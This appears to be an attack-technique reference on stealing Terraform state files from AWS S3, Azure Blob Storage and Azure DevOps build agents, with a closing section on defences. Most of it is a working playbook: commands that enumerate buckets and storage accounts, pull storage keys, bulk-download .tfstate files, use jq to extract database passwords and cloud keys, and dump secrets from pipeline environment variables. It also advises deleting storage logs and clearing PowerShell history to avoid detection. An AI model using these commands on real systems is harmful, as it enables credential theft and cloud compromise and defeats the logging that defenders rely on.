| Attribute | Details |
|---|---|
| Technique ID | SUPPLY-CHAIN-009 |
| MITRE ATT&CK v18.1 | T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools |
| Tactic | Supply Chain Compromise |
| Platforms | Entra ID / DevOps |
| Severity | Critical |
| Technique Status | ACTIVE |
| Last Verified | 2026-01-10 |
| Affected Versions | Terraform 0.11+ (all versions affected) |
| Patched In | N/A - Inherent to Terraform state design; requires operational mitigations |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Terraform state files (.tfstate) are JSON-formatted repositories that store the complete state of managed cloud infrastructure, including sensitive metadata, resource configurations, and credentials. An attacker with access to these files gains the ability to read, modify, or delete infrastructure definitions, steal embedded secrets (database passwords, API keys, SSH keys, SSL certificates), and execute arbitrary infrastructure changes through the Terraform pipeline. The attack typically targets state files stored in insecure remote backends (S3 buckets without encryption or proper access controls), Azure Storage Containers with overly permissive firewall rules, or state files exposed in version control systems, CI/CD pipeline logs, or developer workstations.
Attack Surface: Remote state backends (AWS S3, Azure Blob Storage, Terraform Cloud), Azure DevOps Pipeline secure files libraries, Git repositories (public or private with weak access controls), developer local workstations, and CI/CD build agent caches.
Business Impact: Complete Infrastructure Compromise. An attacker with access to production Terraform state files can exfiltrate all embedded secrets, modify infrastructure to create persistent backdoors, redirect traffic, disable security controls, or delete critical resources. The European Space Agency breach (January 2026) demonstrated the severity: attackers stole 200GB of data including Terraform files, CI/CD pipelines, and hardcoded credentials from a single week of repository access, enabling supply chain attacks against 23 member states.
Technical Context: This attack typically requires 5-15 minutes of hands-on execution once access to the remote backend is obtained. The attack surface is vast because Terraform state files are accessed by: (1) developer workstations during terraform plan and terraform apply operations, (2) CI/CD agents executing deployment pipelines, (3) Terraform Cloud/Enterprise workers if using managed services, and (4) backup and disaster recovery systems. Detection is difficult because state file access is legitimate operational activity; distinguishing malicious access from routine backups or maintenance requires behavioral analysis and strict access logging.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 1.20, 3.1-3.5 | Secure backend storage, encryption, access logging |
| DISA STIG | SI-4, SC-7 | Security system monitoring and boundary protection |
| CISA SCuBA | CM-2, CM-5, CM-6 | Configuration management baseline, access restrictions |
| NIST 800-53 | AC-3, AC-6, SC-7, SI-4, SC-28 | Access control, least privilege, boundary protection, encryption at rest |
| GDPR | Art. 32, Art. 5(1)(f) | Security of processing, integrity and confidentiality of data |
| DORA | Art. 9, Art. 16 | Protection and prevention; ICT risk management |
| NIS2 | Art. 21, Art. 25 | Cyber risk management, detection and response |
| ISO 27001 | A.9.2.3, A.12.2.1, A.13.1.1 | Management of privileged access, asset management, encryption |
| ISO 27005 | 8.3.1, 8.3.2 | Configuration control and change management |
Supported Versions: Terraform 0.11+, all AWS SDK versions
Objective: Identify candidate S3 buckets that may contain Terraform state files by scanning for common naming patterns (e.g., terraform-state-*, *-tfstate*, prod-terraform-*).
Command (AWS CLI):
# List all S3 buckets accessible to current credentials
aws s3api list-buckets --output table
# Scan buckets for Terraform state naming patterns
aws s3api list-buckets --output json | \
jq '.Buckets[].Name' | \
grep -i -E '(terraform|tfstate|state)'
Expected Output:
Name: terraform-state-prod
Name: company-tfstate-backend
Name: dev-terraform-configs
Name: legacy-infrastructure-state
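The grep-based triage above can also be run offline against an exported bucket list; a minimal Python sketch (function name and sample bucket names are illustrative, not AWS tooling):

```python
import re

# Same patterns the grep pipeline above matches on.
STATE_HINT = re.compile(r"terraform|tfstate|state", re.I)

def candidate_buckets(names: list) -> list:
    """Keep only bucket names that hint at Terraform state storage."""
    return [n for n in names if STATE_HINT.search(n)]

# Fabricated sample list resembling the expected output above.
names = ["terraform-state-prod", "company-tfstate-backend",
         "marketing-assets", "legacy-infrastructure-state"]
print(candidate_buckets(names))
```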
What This Means:
- Buckets whose names contain terraform, tfstate, or state are high-confidence targets.
- Listing buckets requires only the s3:ListAllMyBuckets permission; if this command fails with Access Denied, the attached policy is more restrictive, but lateral movement or privilege escalation may still be possible.

OpSec & Evasion:
AWS CloudTrail records ListBuckets API calls with the principal ARN, timestamp, and source IP. To evade detection: (1) perform enumeration during normal business hours when DevOps activity is high, (2) use assumed roles associated with legitimate service accounts, (3) minimize the time between enumeration and exploitation, (4) consider using AWS CLI with credentials from a compromised CI/CD pipeline token rather than direct AWS access keys.

Troubleshooting:
An error occurred (AccessDenied) when calling the ListBuckets operation
Fix: Confirm which credentials are active with aws configure --profile <profile_name>. Alternatively, if you have valid Entra ID credentials with cross-cloud federation enabled, attempt to assume an AWS role via an Azure AD OIDC token.

Objective: Verify whether the identified S3 bucket is publicly accessible or has encryption enabled, which determines exploitation difficulty.
Command (AWS CLI):
# Check if bucket is publicly accessible
aws s3api get-bucket-acl --bucket <BUCKET_NAME>
# Check block public access settings
aws s3api get-public-access-block --bucket <BUCKET_NAME> 2>/dev/null || echo "Block public access: Not configured"
# Check encryption status
aws s3api get-bucket-encryption --bucket <BUCKET_NAME> 2>/dev/null || echo "Encryption: Not configured"
# Check bucket versioning
aws s3api get-bucket-versioning --bucket <BUCKET_NAME>
Expected Output (Insecure Configuration):
{
"Grants": [
{
"Grantee": {
"Type": "CanonicalUser",
"ID": "7c6d5..."
},
"Permission": "FULL_CONTROL"
}
]
}
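An ACL response like the one above can be triaged programmatically. The helper below is a sketch (function name and sample data are illustrative, not AWS tooling) that flags group grants exposing the bucket beyond the owning account:

```python
# Grantee URIs that indicate the bucket is readable beyond the owning account.
RISKY_GROUP_URIS = (
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
)

def risky_grants(acl: dict) -> list:
    """Return (URI, permission) pairs from a get-bucket-acl response
    that expose the bucket to all or all-authenticated AWS users."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in RISKY_GROUP_URIS:
            findings.append((grantee["URI"], grant.get("Permission")))
    return findings

# Fabricated example: the owner grant shown above plus a public-read grant.
acl = {
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "7c6d5..."}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
    ]
}
print(risky_grants(acl))
```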
What This Means:
- If get-bucket-acl returns grants beyond the bucket owner, with Type: CanonicalUser for unknown accounts or Type: Group (especially AuthenticatedUsers or AllUsers), the bucket permissions are misconfigured.
- If get-public-access-block returns false for all settings (or errors), public access restrictions are not enabled.

OpSec & Evasion:
Troubleshooting:
NoSuchBucketPolicy or NoSuchBucket
Fix: These calls require the GetBucketPolicy and GetBucketAcl permissions. If you lack these, attempt to list bucket contents directly with aws s3 ls s3://<BUCKET_NAME>/ to determine if you have read access to objects.

Objective: Enumerate state files within the bucket and download them to the attacker-controlled system for offline analysis and credential extraction.
Command (AWS CLI):
# List all objects in the bucket
aws s3api list-objects-v2 --bucket <BUCKET_NAME> --output table
# Filter for .tfstate files
aws s3api list-objects-v2 --bucket <BUCKET_NAME> --output json | \
jq '.Contents[] | select(.Key | endswith(".tfstate")) | {Key: .Key, Size: .Size, LastModified: .LastModified}'
# Download all .tfstate files to local directory
aws s3 cp s3://<BUCKET_NAME>/ ./terraform-states/ --recursive --exclude "*" --include "*.tfstate"
# Download specific state file
aws s3api get-object --bucket <BUCKET_NAME> --key terraform.tfstate ./terraform.tfstate
Expected Output:
Key: production/terraform.tfstate
Size: 2048576 bytes
LastModified: 2026-01-09T14:32:15Z
Key: staging/terraform.tfstate
Size: 1024000 bytes
LastModified: 2026-01-08T10:15:22Z
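The jq filter above maps directly to a small function over the list-objects-v2 JSON; a sketch with fabricated sample data:

```python
def state_objects(listing: dict) -> list:
    """Keep only .tfstate entries (key, size, timestamp) from a
    list-objects-v2 style response."""
    return [
        {"Key": o["Key"], "Size": o["Size"], "LastModified": o["LastModified"]}
        for o in listing.get("Contents", [])
        if o["Key"].endswith(".tfstate")
    ]

# Fabricated listing resembling the expected output above.
listing = {
    "Contents": [
        {"Key": "production/terraform.tfstate", "Size": 2048576, "LastModified": "2026-01-09T14:32:15Z"},
        {"Key": "production/README.md", "Size": 512, "LastModified": "2026-01-02T09:00:00Z"},
        {"Key": "staging/terraform.tfstate", "Size": 1024000, "LastModified": "2026-01-08T10:15:22Z"},
    ]
}
for obj in state_objects(listing):
    print(obj["Key"], obj["Size"])
```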
What This Means:
- Each .tfstate file represents a Terraform workspace or environment. Multiple files indicate multiple managed infrastructure stacks.

OpSec & Evasion:
GetObject and ListObjectsV2 API calls are logged but blend in with normal backup/restoration activity. To evade detection: (1) retrieve state files during scheduled backup windows, (2) use download acceleration settings to minimize transfer time, (3) if possible, compress state files to reduce transfer size and time in transit.

Troubleshooting:
InvalidStorageClass or NoSuchKey
Fix: Check whether versioning is enabled with aws s3api list-object-versions --bucket <BUCKET_NAME>. If versioning is enabled, download the previous state version: aws s3api get-object --bucket <BUCKET_NAME> --key terraform.tfstate --version-id <VERSION_ID> ./terraform.tfstate.backup

Objective: Analyze the JSON state file to identify and extract embedded secrets such as database passwords, API tokens, SSH keys, and SSL certificates.
Command (Bash/jq):
# Pretty-print state file to identify resource structure
jq '.' terraform.tfstate | less
# Extract database resource passwords
jq '.resources[] | select(.type == "aws_db_instance") | .instances[].attributes | {db_name, master_username, master_password}' terraform.tfstate
# Extract API keys and tokens
jq '.resources[] | select(.type == "aws_api_gateway_api_key") | .instances[].attributes.value' terraform.tfstate
# Extract credentials from any AWS resource exposing a password attribute
jq '.resources[] | select(.type | startswith("aws_")) | .type as $t | .instances[].attributes | select(has("password")) | {type: $t, password}' terraform.tfstate
# Extract key pair material (note: aws_key_pair stores only the public key; private keys may appear in tls_private_key resources)
jq '.resources[] | select(.type == "aws_key_pair") | .instances[].attributes.public_key' terraform.tfstate
# Extract SSL certificates
jq '.resources[] | select(.type == "tls_self_signed_cert") | .instances[].attributes | {cert_pem, private_key_pem}' terraform.tfstate
# Search for all attributes containing "secret", "password", "key", or "token"
jq '.resources[] | .instances[].attributes | with_entries(select(.key | test("secret|password|key|token|credential"; "i")))' terraform.tfstate
Expected Output:
{
"db_name": "production_database",
"master_username": "admin",
"master_password": "Super$SecureP@ssw0rd!2024"
}
{
"key": "AKIA1234567890ABCDE",
"secret": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
}
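The targeted jq queries above can be generalized into a recursive walk over the parsed state; a Python sketch (the keyword list and sample state fragment are illustrative):

```python
import re

# Same credential keywords the jq searches above look for.
SENSITIVE = re.compile(r"secret|password|key|token|credential", re.I)

def find_secrets(node, path=""):
    """Recursively walk a parsed .tfstate document and yield
    (attribute path, value) pairs whose names match credential keywords."""
    if isinstance(node, dict):
        for k, v in node.items():
            p = f"{path}.{k}" if path else k
            if SENSITIVE.search(k) and isinstance(v, str):
                yield (p, v)
            yield from find_secrets(v, p)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from find_secrets(v, f"{path}[{i}]")

# Minimal fabricated state fragment resembling the expected output above.
state = {
    "resources": [
        {"type": "aws_db_instance", "instances": [
            {"attributes": {"db_name": "production_database",
                            "master_username": "admin",
                            "master_password": "Super$SecureP@ssw0rd!2024"}}
        ]}
    ]
}
for path, value in find_secrets(state):
    print(path, "=>", value)
```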
What This Means:
- Extracted AWS access keys (prefixed AKIA for long-term keys or ASIA for temporary credentials) are directly usable for AWS API calls and can be used to escalate privileges, access additional resources, or create persistence mechanisms.

OpSec & Evasion:
Troubleshooting:
Cannot index string with string "resources"
Fix: jq is likely parsing ciphertext rather than JSON because the file was client-side encrypted with a KMS key; decrypting it requires the kms:Decrypt permission. First confirm whether the file is valid JSON state: jq '.terraform_version' terraform.tfstate. If it is encrypted, decrypt with: aws kms decrypt --ciphertext-blob fileb://terraform.tfstate --key-id arn:aws:kms:REGION:ACCOUNT:key/KEY_ID --output text --query Plaintext | base64 -d > terraform.tfstate.decrypted

Supported Versions: Terraform 0.12+, Azure CLI 2.0+
Objective: Identify Azure Storage Accounts containing Terraform state files accessible to the current Entra ID credentials.
Command (Azure CLI):
# Login with compromised Service Principal credentials
az login --service-principal -u <CLIENT_ID> -p <CLIENT_SECRET> --tenant <TENANT_ID>
# List all Storage Accounts in current subscription
az storage account list --output table
# Filter for accounts with names matching Terraform conventions
az storage account list --output json | \
jq '.[] | select(.name | test("terraform|state|tfstate"; "i")) | {name, id, location}'
# Get storage account keys (if the current principal has read access)
az storage account keys list --resource-group <RESOURCE_GROUP> --account-name <STORAGE_ACCOUNT_NAME>
Expected Output:
Name: terraformstateprod
ResourceGroup: infrastructure-rg
Location: westeurope
Name: stagingstate
ResourceGroup: staging-rg
Location: eastus2
What This Means:
- Storage accounts whose names contain terraform, state, or similar are high-confidence targets.

OpSec & Evasion:
Azure Activity Logs record list-keys operations and storage account enumerations. To minimize detection: (1) perform enumeration through a compromised application or VM in the target network (traffic appears to originate from within the VNet), (2) use a stolen JWT token from a legitimate client rather than direct Service Principal authentication.

Troubleshooting:
Access denied with status code 403
Fix: The current principal lacks the required role on the storage account. Enumerate guest users (az ad user list --filter "userType eq 'Guest'") to identify federated identities that may have broader permissions.

Objective: List blob containers within the storage account and identify those containing Terraform state files.
Command (Azure CLI):
# Set storage account and key for auth
export STORAGE_ACCOUNT=<STORAGE_ACCOUNT_NAME>
export STORAGE_KEY=$(az storage account keys list --resource-group <RG> --account-name $STORAGE_ACCOUNT --output json | jq -r '.[0].value')
# List all blob containers
az storage container list --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --output table
# List blobs in a specific container
az storage blob list --container-name <CONTAINER_NAME> --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --output table
# Filter for .tfstate files
az storage blob list --container-name <CONTAINER_NAME> --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --output json | \
jq '.[] | select(.name | endswith(".tfstate")) | {name, properties}'
Expected Output:
Name: tfstate
Lease Status: unlocked
Name: terraform-configs
Lease Status: unlocked
Name: prod/terraform.tfstate
ContentLength: 2097152
LastModified: 2026-01-09T14:32:15Z
What This Means:
- Containers with Lease Status: unlocked are actively accessible and not currently locked for modification.
- Look for blobs with the .tfstate extension in containers named terraform, tfstate, or state.

OpSec & Evasion:
Azure Storage analytics logging, when enabled, writes to the hidden container ($logs). To evade detection: (1) if you compromise a storage account, delete or truncate logs after exfiltration, (2) use Azure CLI from within an Azure VM to make traffic appear internal.

Troubleshooting:
The public access level of the container cannot be determined
Fix: Ensure you set STORAGE_KEY correctly. If you don’t have the storage account key, attempt to retrieve it via the Azure portal or use az role assignment list --assignee <YOUR_PRINCIPAL_ID> to check if you have owner permissions, which allow key retrieval.

Objective: Download state files to the attacker’s system for offline parsing and credential extraction.
Command (Azure CLI):
# Download a single state file
az storage blob download --container-name <CONTAINER_NAME> \
--name <BLOB_NAME> \
--account-name $STORAGE_ACCOUNT \
--account-key $STORAGE_KEY \
--file ./terraform.tfstate
# Download all .tfstate files from a container
for blob in $(az storage blob list --container-name <CONTAINER_NAME> --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --output json | jq -r '.[] | select(.name | endswith(".tfstate")) | .name'); do
az storage blob download --container-name <CONTAINER_NAME> --name "$blob" --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --file "./$blob"
done
# Verify downloaded file
file terraform.tfstate
jq '.terraform_version' terraform.tfstate
Expected Output:
Finished[#############################################] 100.0000%
File downloaded successfully
terraform_version: "1.5.0"
What This Means:
- A successful download that parses with jq and reports a terraform_version confirms you have a valid, readable state file.
OpSec & Evasion:
Troubleshooting:
ResourceNotFound: The specified blob does not exist
Fix: Verify the blob name against the output of the list command. If the blob was deleted, check if the storage account has soft delete enabled: az storage account blob-service-properties show --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY. If soft delete is enabled, list deleted blobs: az storage blob list --container-name <CONTAINER_NAME> --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --include d

Objective: Extract credentials and sensitive configuration from Azure-specific Terraform resources.
Command (Bash/jq):
# Extract Azure SQL Database credentials
jq '.resources[] | select(.type == "azurerm_mssql_server") | .instances[].attributes | {administrator_login, administrator_login_password}' terraform.tfstate
# Extract Cosmos DB keys
jq '.resources[] | select(.type == "azurerm_cosmosdb_account") | .instances[].attributes | {primary_master_key, secondary_master_key, primary_readonly_master_key}' terraform.tfstate
# Extract Storage Account keys
jq '.resources[] | select(.type == "azurerm_storage_account") | .instances[].attributes | {storage_account_name, primary_access_key, secondary_access_key}' terraform.tfstate
# Extract Key Vault secrets and keys
jq '.resources[] | select(.type == "azurerm_key_vault_secret") | .instances[].attributes | {name, value}' terraform.tfstate
# Extract application secrets and client IDs
jq '.resources[] | select(.type == "azurerm_app_configuration") | .instances[].attributes | {name, primary_read_key, primary_write_key}' terraform.tfstate
# Comprehensive search for all sensitive data
jq '.resources[] | .instances[].attributes | with_entries(select((.value | type) == "string" and (.value | test("^[A-Za-z0-9+/]{40,}={0,2}$"))))' terraform.tfstate
Expected Output:
{
"administrator_login": "sqladmin",
"administrator_login_password": "P@ssw0rd123!AzureSQL"
}
{
"primary_master_key": "AccountKey==aBcDeFgHiJkLmNoPqRsTuVwXyZ0123456789=="
}
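The base64-style regex from the comprehensive jq search above can be reused offline; a sketch with fabricated attribute values:

```python
import re

# Same pattern as the jq one-liner above: long base64-looking strings.
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")

def suspicious_values(attributes: dict) -> dict:
    """Keep only string attributes that look like encoded keys or tokens."""
    return {k: v for k, v in attributes.items()
            if isinstance(v, str) and B64ISH.match(v)}

# Fabricated attribute map for illustration.
attrs = {
    "storage_account_name": "terraformstate123",
    "primary_access_key": "aBcDeFgHiJkLmNoPqRsTuVwXyZ0123456789aBcDeFgHiJkL==",
}
print(suspicious_values(attrs))
```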
What This Means:
OpSec & Evasion:
Troubleshooting:
jq: error (at <line>): Cannot index null with string
Fix: Validate the file first with jq empty terraform.tfstate. If parsing fails, the file may be truncated or corrupted. Try downloading from a backup version if available.

Supported Versions: Azure DevOps Pipelines, Terraform Enterprise
Objective: Gain access to pipeline variables or service connections that store Terraform state backend credentials (storage account keys, service principal tokens).
Precondition: The attacker must have compromised a developer account with access to the Azure DevOps project or a build agent on the network.
Command (PowerShell, executed from compromised build agent):
# If running inside an Azure DevOps build agent, environment variables may be exposed
Get-ChildItem env: | Where-Object {$_.Name -match "TERRAFORM|STATE|BACKEND|STORAGE|ACCOUNT|KEY|SECRET"}
# Alternative: Check for Terraform backend configuration in the build agent's home directory
Get-ChildItem -Path $env:USERPROFILE\.terraform.d -Recurse -ErrorAction SilentlyContinue | Select-Object FullName
# Check build agent logs for exposed credentials
Get-Content C:\agents\agent\work\_tasks\*\task.json -ErrorAction SilentlyContinue | Select-String -Pattern '(password|key|secret|token|credentials)' -AllMatches
Expected Output:
TERRAFORM_BACKEND_KEY=terraform.tfstate
TF_VAR_storage_account_key=DefaultEndpointsProtocol=https;AccountName=...
SERVICE_CONNECTION_KEY=ClientSecret==...
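The same variable sweep can be done in Python on a Linux agent; a sketch over a fabricated environment (on a live agent you would pass dict(os.environ)):

```python
import re

# Same keyword filter as the Get-ChildItem env: command above.
PATTERN = re.compile(r"TERRAFORM|STATE|BACKEND|STORAGE|ACCOUNT|KEY|SECRET", re.I)

def exposed_credentials(environ: dict) -> dict:
    """Return environment variables whose names suggest backend credentials."""
    return {k: v for k, v in environ.items() if PATTERN.search(k)}

# Fabricated sample resembling the expected output above.
env = {
    "PATH": "/usr/bin",
    "TF_VAR_storage_account_key": "DefaultEndpointsProtocol=https;AccountName=...",
    "TERRAFORM_BACKEND_KEY": "terraform.tfstate",
}
for name in sorted(exposed_credentials(env)):
    print(name)
```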
What This Means:
- Exposed environment variables reveal backend credentials injected at pipeline runtime (variables can be marked as secret() but may still be visible in logs or variable groups).

OpSec & Evasion:
PowerShell command history (C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) will record the enumeration commands. To evade: (1) disable PowerShell logging before commands are executed, (2) clear the PowerShell history after extraction.

Troubleshooting:
Access is denied when accessing service connection files
Fix: Query the service connection through the Azure DevOps REST API instead: curl -X GET https://dev.azure.com/<ORG>/<PROJECT>/_apis/serviceendpoint/endpoints/<ENDPOINT_ID> -H "Authorization: Basic $(echo -n ':<PAT>' | base64)"

Action 1: Encrypt Terraform State Files At Rest
Enable encryption for all remote state backends. For AWS S3, enforce server-side encryption with customer-managed KMS keys.
Manual Steps (AWS S3 + Terraform Configuration):
aws kms create-key --description "Terraform State Encryption Key"
terraform {
backend "s3" {
bucket = "my-terraform-state"
key = "prod/terraform.tfstate"
region = "us-west-2"
encrypt = true
kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/12345678-1234-1234-1234-123456789012"
dynamodb_table = "terraform-locks"
}
}
terraform init
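To confirm the backend bucket really has SSE-KMS as its default, the get-bucket-encryption response can be checked mechanically; a sketch (the response dict below is a fabricated example of the documented S3 API shape):

```python
def uses_kms_encryption(encryption_config: dict) -> bool:
    """Inspect a get-bucket-encryption response and confirm SSE-KMS
    is the default encryption algorithm."""
    rules = (encryption_config
             .get("ServerSideEncryptionConfiguration", {})
             .get("Rules", []))
    return any(
        r.get("ApplyServerSideEncryptionByDefault", {}).get("SSEAlgorithm") == "aws:kms"
        for r in rules
    )

# Fabricated response matching the backend configuration above.
response = {
    "ServerSideEncryptionConfiguration": {
        "Rules": [{"ApplyServerSideEncryptionByDefault": {
            "SSEAlgorithm": "aws:kms",
            "KMSMasterKeyID": "arn:aws:kms:us-west-2:123456789012:key/12345678-1234-1234-1234-123456789012"}}]
    }
}
print(uses_kms_encryption(response))
```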
Manual Steps (Azure Blob Storage + Terraform Configuration):
az storage account create \
--name terraformstate123 \
--resource-group infrastructure-rg \
--sku Standard_GRS \
--encryption-services blob \
--https-only
az storage account update \
--name terraformstate123 \
--resource-group infrastructure-rg \
--encryption-key-name tfstate-key \
--encryption-key-vault /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/infrastructure-rg/providers/Microsoft.KeyVault/vaults/terraform-vault
terraform {
backend "azurerm" {
resource_group_name = "infrastructure-rg"
storage_account_name = "terraformstate123"
container_name = "tfstate"
key = "prod/terraform.tfstate"
use_oidc = true
}
}
Action 2: Implement Strict Access Control on State File Backends
Restrict access to state files to only authorized principals (service accounts, DevOps engineers), following the principle of least privilege.
Manual Steps (AWS S3 Bucket Policy):
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPublicAccess",
"Effect": "Deny",
"Principal": "*",
"Action": "s3:*",
"Resource": [
"arn:aws:s3:::my-terraform-state",
"arn:aws:s3:::my-terraform-state/*"
],
"Condition": {
"Bool": {
"aws:SecureTransport": "false"
}
}
},
{
"Sid": "AllowTerraformExecution",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::123456789012:role/terraform-executor"
},
"Action": [
"s3:GetObject",
"s3:PutObject",
"s3:DeleteObject"
],
"Resource": "arn:aws:s3:::my-terraform-state/*"
}
]
}
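A policy document like the one above can be linted before deployment; a sketch (helper name is illustrative) that verifies the non-TLS Deny statement is present:

```python
def denies_insecure_transport(policy: dict) -> bool:
    """Check that a bucket policy contains a Deny for non-TLS access,
    matching the DenyPublicAccess statement shown above."""
    for stmt in policy.get("Statement", []):
        if (stmt.get("Effect") == "Deny"
                and stmt.get("Principal") == "*"
                and stmt.get("Condition", {}).get("Bool", {})
                        .get("aws:SecureTransport") == "false"):
            return True
    return False

# Abbreviated copy of the policy above.
policy = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "DenyPublicAccess", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*",
         "Resource": ["arn:aws:s3:::my-terraform-state",
                      "arn:aws:s3:::my-terraform-state/*"],
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
}
print(denies_insecure_transport(policy))
```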
Verify with aws s3api get-bucket-policy --bucket my-terraform-state to confirm the policy is applied.

Manual Steps (Azure Blob Storage Access Control):
- Grant access only to the dedicated Terraform service account (e.g., terraform-ci@company.onmicrosoft.com)
- Verify role assignments:
az role assignment list --resource-group infrastructure-rg --assignee terraform-ci@company.onmicrosoft.com
Action 3: Enable State File Locking to Prevent Concurrent Modifications
Implement state locking to ensure only one Terraform operation modifies state at a time, preventing race conditions and unauthorized modifications.
Manual Steps (AWS DynamoDB Locking):
aws dynamodb create-table \
--table-name terraform-locks \
--attribute-definitions AttributeName=LockID,AttributeType=S \
--key-schema AttributeName=LockID,KeyType=HASH \
--billing-mode PAY_PER_REQUEST
- Reference the table in the backend configuration (the dynamodb_table setting)
- Test locking by running terraform apply:
terraform apply -auto-approve # DynamoDB will create lock entry during operation
Manual Steps (Azure Blob Storage Leasing):
terraform {
backend "azurerm" {
resource_group_name = "infrastructure-rg"
storage_account_name = "terraformstate123"
container_name = "tfstate"
key = "prod/terraform.tfstate"
use_oidc = true
# Locking is automatic in Azure; no additional config needed
}
}
az storage blob show \
--container-name tfstate \
--name prod/terraform.tfstate \
--account-name terraformstate123 \
--query properties.lease
Action 1: Enable Audit Logging and Monitoring for State File Access
Configure Azure Activity Logs and AWS CloudTrail to capture all access to state file backends and set up alerts for suspicious patterns.
Manual Steps (AWS CloudTrail for S3 Access Logging):
- Create a CloudTrail trail named terraform-state-audit
- Deliver logs to a dedicated S3 bucket (e.g., cloudtrail-logs-terraform)
- Enable S3 data events for the state bucket (event selector, e.g., terraform-state-access)
- Verify the trail: aws cloudtrail describe-trails --include-shadow-trails

Manual Configuration (Azure Activity Logs):
- In the Azure portal, add a diagnostic setting on resource group infrastructure-rg covering its Storage accounts

Action 2: Implement Secrets Scanning in CI/CD Pipelines
Integrate automated secrets detection tools (e.g., GitGuardian, TruffleHog, Checkov) into CI/CD pipelines to prevent Terraform files with hardcoded secrets from being committed or deployed.
Manual Steps (Azure DevOps Pipeline with Checkov):
.azurepipelines/checkov-scan.yml
```yaml
trigger:
  - main

pool:
  vmImage: 'ubuntu-latest'

steps:
  - task: UsePythonVersion@0
    inputs:
      versionSpec: '3.10'
    displayName: 'Use Python 3.10'

  - script: |
      pip install checkov
    displayName: 'Install Checkov'

  - script: |
      checkov -d . --framework terraform --check CKV_TERRAFORM_1,CKV_SECRET_6 --output cli
    displayName: 'Scan Terraform for Secrets'

  - task: PublishBuildArtifacts@1
    inputs:
      pathToPublish: '$(Build.ArtifactStagingDirectory)'
      artifactName: 'checkov-results'
```
Action 3: Separate Terraform State by Environment and Access Control
Isolate production, staging, and development Terraform state in separate backends with different access controls and credentials.
Manual Steps:
for env in dev staging prod; do
aws s3api create-bucket \
--bucket terraform-state-$env-$(date +%s) \
--region us-west-2 \
--create-bucket-configuration LocationConstraint=us-west-2
done
terraform {
required_version = ">= 1.0"
backend "s3" {
# Dynamically configure based on environment
# This requires external tooling (e.g., backend-config override)
}
}
variable "environment" {
type = string
validation {
condition = contains(["dev", "staging", "prod"], var.environment)
error_message = "Environment must be dev, staging, or prod."
}
}
terraform init \
-backend-config="bucket=terraform-state-prod-12345" \
-backend-config="key=infrastructure.tfstate" \
-backend-config="region=us-west-2"
# Development
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/terraform-dev --role-session-name terraform-dev-session
# Production
aws sts assume-role --role-arn arn:aws:iam::999999999999:role/terraform-prod --role-session-name terraform-prod-session
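The per-environment init shown above can be wrapped in a small helper that builds the -backend-config flags and rejects unknown environments; a sketch (bucket naming mirrors the examples above and is an assumption):

```python
def backend_config_args(environment: str, bucket_suffix: str) -> list:
    """Build terraform init -backend-config flags, one state bucket
    per environment (bucket names are illustrative)."""
    allowed = {"dev", "staging", "prod"}
    if environment not in allowed:
        raise ValueError(f"environment must be one of {sorted(allowed)}")
    return [
        f"-backend-config=bucket=terraform-state-{environment}-{bucket_suffix}",
        "-backend-config=key=infrastructure.tfstate",
        "-backend-config=region=us-west-2",
    ]

print(" ".join(["terraform", "init"] + backend_config_args("prod", "12345")))
```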
Conditional Access (Azure): Restrict Terraform operations to compliant devices and approved networks
- Create a Conditional Access policy (e.g., named Terraform State Access - Managed Devices Only)

RBAC Configuration: Ensure minimal required roles for Terraform service principals
# Example: Least privilege role for Terraform execution
az role definition create --role-definition '{
"Name": "TerraformExecutor",
"Description": "Custom role for Terraform state access",
"Type": "CustomRole",
"AssignableScopes": ["/subscriptions/<SUBSCRIPTION_ID>"],
"Permissions": [
{
"Actions": [
"Microsoft.Storage/storageAccounts/read",
"Microsoft.Storage/storageAccounts/listKeys/action",
"Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read",
"Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write",
"Microsoft.Storage/storageAccounts/blobServices/containers/blobs/delete"
],
"NotActions": [
"Microsoft.Storage/storageAccounts/delete",
"Microsoft.Storage/storageAccounts/update"
]
}
]
}'
Validation Command (Verify Mitigations):
# Verify S3 bucket encryption
aws s3api get-bucket-encryption --bucket my-terraform-state --output table
# Verify S3 bucket policy denies public access
aws s3api get-bucket-acl --bucket my-terraform-state | grep "AllUsers"
# Verify DynamoDB locking table exists
aws dynamodb describe-table --table-name terraform-locks --output table
# Verify Azure storage account encryption
az storage account show --resource-group infrastructure-rg --name terraformstate123 --output json | jq '.encryption'
# Verify audit logging is active
aws cloudtrail describe-trails --include-shadow-trails --output table | grep "S3BucketName\|IsMultiRegionTrail"
Expected Output (If Secure):
S3 Encryption: AES256 or aws:kms
S3 ACL: Only authenticated AWS account has access
DynamoDB LockID table: ACTIVE
Azure encryption: Microsoft.Storage/storageAccounts/encryptionServices/blob/enabled: true
CloudTrail: IsMultiRegionTrail: true, S3BucketName: cloudtrail-logs-terraform
Network IOCs:
